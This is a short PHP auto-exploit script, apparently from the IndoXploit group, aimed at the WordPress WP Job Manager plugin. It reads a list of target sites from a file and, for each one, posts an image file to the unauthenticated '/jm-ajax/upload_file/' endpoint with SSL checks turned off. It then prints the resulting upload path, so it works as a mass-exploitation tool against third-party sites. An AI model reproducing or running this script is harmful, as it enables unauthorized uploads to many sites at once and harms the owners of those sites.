Exploit wp-job-manager

1. <?php
2. # Tu5b0l3d - IndoXploit
3. # http://www.indoxploit.or.id/2017/06/auto-exploit-plugin-wp-job-manager.html
4.  
5.  
6. $nama = "target.html";
7. $buka=fopen("$nama","r");
8. $size=filesize("$nama");
9. $baca=fread($buka,$size);
10. $sites = explode("\r\n", $baca);
11. foreach($sites as $site){
12.     if(preg_match("#http://#", $site)) {
13.     $suu = $site;
14.  } else {
15.    $suu = "http://".$site;
16.  }
17.     echo "$suu ->";
18.     $file = "k.png";
19.     $site = "$suu/jm-ajax/upload_file/";
20.     $post = array(
21.                     "file" => "@$file",
22.                     );
23. $ch = curl_init ("$site");
24. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
25. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
26. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
27. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
28. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
29. curl_setopt ($ch, CURLOPT_POST, 1);
30. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
31. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
32. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
33. $data6 = curl_exec ($ch);
34.         if (preg_match("/$file/i", $data6)){
35.             $save = "$suu/wp-content/uploads/job-manager-uploads/file/2017/06/$file";
36.                 echo  " \n$save\n";
37.              
38.         }else{
39.                 echo " \nNo\n"; }
40.     }
41.    
42.  
43. ?>